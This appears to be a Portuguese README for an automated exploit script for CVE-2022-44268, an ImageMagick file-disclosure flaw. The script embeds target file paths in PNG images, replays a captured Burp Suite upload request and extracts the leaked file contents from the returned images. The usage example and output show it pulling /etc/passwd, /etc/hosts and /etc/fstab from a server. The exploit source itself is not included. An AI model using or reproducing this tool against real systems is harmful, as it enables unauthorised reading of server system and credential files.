
Script Python automático que utiliza a cve-2022-44268 para adicionar um valor de perfil com um nome de arquivo de uma lista de arquivos de entrada em um arquivo de entrada, atualizar o upload do arquivo de imagem usando um arquivo request.req de entrada do Burpsuite (já incluído) do upload do arquivo, enviando cada imagem modificada, e baixar as imagens retornadas da URL retornada e extrair o conteúdo do arquivo e colocá-lo em um diretório de entrada.
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab